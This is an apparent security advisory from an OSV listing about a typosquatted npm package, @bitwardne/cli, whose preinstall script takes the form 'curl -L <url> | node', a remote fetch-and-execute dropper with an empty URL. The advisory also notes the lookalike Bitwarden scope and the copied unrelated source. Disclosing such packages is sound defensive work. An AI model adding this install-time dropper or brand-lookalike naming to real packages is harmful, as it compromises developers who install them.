@bitwardne/cli@1.0.1
Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 9:46 PM UTC
OSV ID
MAL-2026-17693
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle script of the form 'curl -L <url> | node', which fetches remote content and executes it in Node at npm install time. In this published version the URL slot is empty so the command fails as shipped, but the script shape is a canonical install-time remote-code-execution dropper that fires automatically on npm install. The package is published under the @bitwardne scope — a one-character variation of the Bitwarden brand — while the shipped source is a verbatim copy of the unrelated 'cli' option-parser library by Chris O'Hara (homepage node-js-libs/cli), with no legitimate connection between the scope name and the vendored code.
Source: amazon-inspector (cf7d0b3168a3a56cb6208688970e6109a964ccfb99a97fe7061d57e007b67ca6)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.